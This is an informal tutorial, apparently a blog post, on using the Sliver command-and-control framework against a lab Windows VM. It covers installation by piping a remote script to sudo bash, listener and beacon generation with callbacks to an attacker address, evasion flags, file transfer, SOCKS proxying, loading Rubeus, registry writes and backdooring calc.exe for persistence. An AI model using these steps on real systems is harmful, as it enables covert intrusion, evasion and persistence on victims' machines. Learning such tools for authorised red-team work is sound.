Sliver

About Sliver

Sliver is a modern C2 . And it is,imo, absolutely KINO piece of work . It is very OPSec conscious . Sadly,there exists no proper documentation for begginers as the devs say this for the PRO gamers only . So lets try to write some stuff which would make skiddies like me use it better.

[correct me if there's something wrong]

Installation

curl https://sliver.sh/install|sudo bash and then run sliver

create a service for sliver as you'll have to start the client and server each time (which is a pain) to create a service ,create a /etc/systemd/system/sliver.service and configure it as follows

[Unit]
Description=Sliver
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=on-failure
RestartSec=3
User=root
ExecStart=/usr/local/bin/sliver-server daemon

[Install]
WantedBy=multi-user.target

now we can start sliver service with systemctl start sliver

Listeners/Jobs

sliver offers multiple variations of listeners/jobs . NS, Mutual TLS (mTLS), WireGuard, and HTTP(S)

• DNS

• mtls

• http

• https

• wg

MTLS - This is similar to a typical meterpreter reverse shell

WireGuard - WG is a VPN-like protocol . This allows the devices to communicate as if they were on the same network ,think of it something like a NAT.

creating a job

first lets create a http job with the following command , lets see what the http command takes . type help http

to start a simple http job on port 80 and listens on 0.0.0.0, you can just run http , to mention a different port use -l <port> like http -l 8080 . And if you want it to persist through reboots just add the -p flag at the end . this should be enough to get started.

Creating a job : http -l 80

You can ignore the stuff starting from #[ignore] ---- [ignore_end]#

#[ignore] We'll talk about the other flags , the J & Tflags indicating the long polling jitter and time-out . Long polling is a real time communication style in which the client(beacon ,in our case) sends a request to the server and waits for a response. If the server does not have any data to send to the client, it holds the request open for a certain period of time, known as the long poll timeout . and as for the w, the help menu says the following

we can customize these for real engagements to blend-in better .

[ignore_end]#

we now have a listener/job , lets see it by typing jobs

note that there are other type of jobs available , feel free to try those out . The Devs recommend trying out the wg and mtls .

Beacons & profiles

beacons

alright now we have a job ,lets create a beacon . I will just create a simple beacon to connect back the job we have using the following command generate beacon --http http://10.0.0.174 -j 10 -s /tmp/

--http flag means that the beacon we are creating will connect to the http job we created before , the --http flag takes one argument and it is the address . hence we mention http://10.0.0.174, incase you have a job at port 8080 then you use http://10.0.0.174:8080

replace --http with --dns for dns job and --mtls --wg for the respective jobs

j is the time that the beacon takes to connect back to the server . so now it will connect back every 10 secs . s is save . Sliver automatically creates a random name for the binary . This should be enough to get started

interacting with the Beacon

one you deliver the beacon using [redacted] ways . you should be able see a beacon has checked in and you can then interact with the command use beacon <beacon ID>

(I ran it twice so , i have two beacons)

<on the victim machine which is a windows 10 VM>

now type help to see the available options .

These are the normal commands that you can run . IT IS HIGHLY SUGGESTED THAT YOU ONLY USE THESE COMMANDS(during engagements)TO PERFORM REQUIRED ACTIONS AND DO NOT OPEN A SHELL*

for simpilicity sake,Lets convert the beacon into an interactive session using interactive command . by doing this you dont have to wait for the beacon to connect back in specific intervals (this is not really suggested ) .

now type sessions to see available sessions and type use <session ID to interact with it .

if you try to drop into a shell using the shell command sliver warns you that is bad opsec.

lets try to use the upload command to upload a file . upload takes a two arguments which are strings and the value for 1st argument has to be the absoulute local path to the file . And value to second argument is the remote destination, if you do not mention it then it will upload to the folder where the beacon was downloaded . I uploaded another beacon to the victim machine . upload /path/to/file

and it was uploaded successfully

lets download the file we just uploaded using the download command. the download command also takes two string arguments which are

• remote path to download from

• local path to save the downloaded file

lets say you want to run a program but you dont want to tranfser it manually and do it . sliver got you covered with the execute command . the execute command takes the following arguments and optional flags . I do not have an apt example to show the use case . so i'll leave this .

the execute-assembly command lets you run the .net programs in memory of a process .

the socks5 is probably the most important one , to run it you simply run socks5 start (make sure you are interacting with beacon or a session when you are running)

sliver has an amazing command which is really cool and that is armory which has a set of c# tools which makes your life easy type armory and you can see all the available tools . to install them all at once you can run armory install all

And now i can simply use rubeus by typing rubeus .

you can simple type help <command> to get a reasonable explanation on how to use the commands (read this incase you are having trouble passing the arguments https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions#aliases-command-parsing )

you can also write to the registry using the registry command. that'd be it for the sliver commands , I wanna get in depth about the beacon generation as i think it has some cool features .

#[ignore] lets now see all the options generate has to offer . type help generate

So we have quite a few options , lets ignore the self explanatory ones . c this flag lets us add a canary domain which is like a fake-domain name (again for better opsec) . I am not entirely sure about this but think of the canary domains like honey pots . d this lets you see a verbose version of the binary,when you run this you can see the actions performed by the binary

.

e this enables evasion . from the source code it looks like it is doing ppid spoofing and reloading the dll from the disk to remove any hooks .

p this flag creates named pipes which lets processes to communicate in a full duplex mode . (named pipes are a type of IPC)

R this flags runs the beacon by calling the dllmain , this can be used in cases such as dll sideloading . In case you have a dll you want side load into a process ,so you'd want to call the dllmain manually instead of letting the compiler add it . There might be other use cases , feel free to educate me about those 😄

Z i have not tested this ,but I think this randomizes the domains given as canary strings . Also sliver produces lot of random web traffic with requests to common sites such as phpmyadmin and many more .

[ignore_end]#

profiles

The creation of the beacons is kinda tiring each time , how about we have a profile that has our beacon config ? this way we don't have to create the beacons manually all the time . profiles new beacon --arch amd64 --os windows --http 10.0.0.174 -f shellcode --evasion --timeout 175 --seconds 10 --jitter 10 ginger

notice that all these flags are the ones we used while creating the beacon except the first and last arguments . the profiles new indicates to create a profile and ginger is the profile name

lets create a new beacon for our profile profiles generate --save . ginger

you can chose any format instead of bin .

you can use the backdoor command with to hijack an exe on the victim machine to maintain persistence .

backdoor -p ginger "C:\windows\system32\calc.exe" notice that we used our profile here , the backdoor takes p flag to load the config of the beacon and it requires it to be in shellcode format .

I think these would be enough to get started for using sliver . There is a multiplayer mode as well ,which we will cover later . multiplayer mode is like a team server .